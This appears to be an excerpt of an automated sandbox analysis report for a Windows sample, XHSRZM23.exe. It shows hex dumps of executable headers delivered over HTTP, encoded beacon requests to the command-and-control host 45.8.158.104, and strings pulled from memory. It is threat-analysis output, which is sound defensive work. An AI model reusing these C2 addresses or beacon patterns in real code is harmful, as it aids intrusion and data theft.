Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:03 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:03 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:04 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:05 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:05 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 13 Oct 2022 06:48:10 GMTContent-Type: application/octet-streamContent-Length: 37888Connection: keep-aliveLast-Modified: Sat, 08 Oct 2022 10:45:31 GMTETag: "9400-5ea83a016a268"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 86 91 2b 1d e7 ff 78 1d e7 ff 78 1d e7 ff 78 14 9f 6c 78 15 e7 ff 78 1d e7 fe 78 51 e7 ff 78 de e8 a2 78 1e e7 ff 78 14 9f 76 78 06 e7 ff 78 14 9f 6b 78 1c e7 ff 78 14 9f 6e 78 1c e7 ff 78 52 69 63 68 1d e7 ff 78 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c9 96 25 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 10 00 00 00 10 00 00 00 00 00 00 2f 18 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 02 00 00 84 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 20 00 00 50 00 00 00 00 50 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 04 00 00 00 20 00 00 00 06 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 01 00 00 00 30 00 00 00 02 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 dc 02 00 00 00 40 00 00 00 04 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 50 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 00 00 00 60 00 00 00 72 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 4a 00 21 94 56 b0 d8 0c 4a 15 9e 00 62 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/gkKIfJKu9W/RfGqkB9ODhAT7t3c5/NgU9QmTJW10x/ljH6Rbwk6Te/NQKogNebUNXkBe/OP8YU_2BPfX7w7JRWnzlY/DYJ2tPBGUU9yVi7O/2UHx3wnrI8usjfi/mEy_2FvxgACU_2BVfF/k_2BhGhcG/DY4c1ymhU_2BCF0kWEYq/M0_2B_2F16h_2BgoOGF/9_2FtG_2F6BZfr3nq2A72O/TaGtamWcSmCx5/BKV7x7CGne61RjWS63/G.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyDXRc_2B/ixVyFqQK/k126u_2B_2Ba_2BruFx1_2F/jniVE8w7fc/bk1R9cvUDCNSr3LVX/6pZVXtyVf482/WFP0247XYM7/A2gUdzKCCOqwfV/Gv8pnlgo2_2FOJ3S2ifKR/bqy_2FBRKHq_2Fpg/Vdjwqlx7uWisr2l/fEIsbd32W_2FSgiOj7/dytSGoyJO/SSfkZcDtemeWWSjAjk_2/FpEHeBUMQUi3yJQSNuD/_2FtYwM7I7Bk/pKYwZ.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qfwxbX9aDBL1/IeT5piixzi8h4SRl9u/8_2B0Atg2/EH_2BuWU2tSI81tfObAy/vUlIlX4Ry5a2Lkg_2BA/WrsB69Jk6Nr0AfUnViCZgr/xOQsHH2r7bRf4/GbUKvAO_/2B_2BNCAwjUDjs1PnMfwFho/BSlcplWuk_/2ByFg1B7Jha7Qhk7w/kMamT9D_2B57/Uw_2B3UVmpC/BA7AL3JebG7W65/8MiRPWVyAeG2AtQC9YkgU/qP7k.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DHUBRU DHUBRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.8.158.104 45.8.158.104
Source: XHSRZM23.exe, 00000001.00000003.508165761.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, XHSRZM23.exe, 00000001.00000003.518516671.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, XHSRZM23.exe, 00000001.00000002.563297746.000000000064A000.00000004.00000020.00020000.00000000.sdmp, XHSRZM23.exe, 00000001.00000002.563720348.00000000006BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/g
Source: XHSRZM23.exe, 00000001.00000002.563297746.000000000064A000.00000004.00000020.00020000.00000000.sdmp, XHSRZM23.exe, 00000001.00000002.563614634.00000000006A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyD
Source: XHSRZM23.exe, 00000001.00000002.563614634.00000000006A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qf
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
